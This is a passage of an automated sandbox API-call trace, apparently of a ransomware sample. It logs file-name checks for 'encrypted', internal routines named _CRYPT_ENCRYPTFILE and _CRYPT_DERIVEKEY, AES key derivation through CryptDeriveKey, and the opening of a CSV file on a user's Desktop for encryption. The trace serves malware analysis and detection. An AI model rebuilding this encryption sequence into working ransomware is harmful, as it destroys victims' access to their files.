lpString1="\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="etaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="taqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.024] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.024] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.024] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.024] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.024] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.024] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.024] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.024] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87352130, ftCreationTime.dwHighDateTime=0x1d5c596, ftLastAccessTime.dwLowDateTime=0xb2371be0, ftLastAccessTime.dwHighDateTime=0x1d5b6f0, ftLastWriteTime.dwLowDateTime=0xb2371be0, ftLastWriteTime.dwHighDateTime=0x1d5b6f0, nFileSizeHigh=0x0, nFileSizeLow=0x93d0, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="WPwH2Letaqsal.csv", cAlternateFileName="WPWH2L~1.CSV")) returned 0x7c2100 [0032.025] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.025] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.025] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.025] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.025] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.025] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.025] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.025] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.025] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.025] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.025] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0032.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.025] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0032.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.026] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.026] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.026] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.027] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.027] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.027] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.027] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.027] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.027] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.028] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.028] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.028] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.028] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.028] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.028] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.028] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.028] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.029] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.029] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0032.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.029] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0032.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.029] CryptDestroyHash (hHash=0x7c2240) returned 1 [0032.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.029] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.029] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.029] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.029] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.029] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wpwh2letaqsal.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.029] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.029] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.031] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 